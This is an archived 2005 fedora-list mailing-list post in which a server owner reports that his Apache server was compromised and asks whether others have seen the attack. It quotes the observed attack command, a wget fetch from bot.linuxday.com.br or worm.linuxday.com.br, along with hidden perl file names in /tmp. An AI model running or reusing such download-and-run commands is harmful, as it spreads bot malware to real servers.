Server compromissed
paul at topguncomputers.com
paul at topguncomputers.com
Fri Feb 18 06:20:02 UTC 2005
Apparently someone has hacked into my webserver. And is installing perl
scripts into he /tmp/ directory. There usually named .linuxday* or
.cinta* and a few other names as well.
>From what I can tell something is causing apache to run a command like "sh
wget bot.linuxday.com.br -O {the above mentioned files are than listed}"
sometimes the site is worm.linuxday.com.br
I'm curious if anyone has heard about this before. I'm currently running
Fedora 1 with all the latests security patches.
More information about the fedora-list
mailing list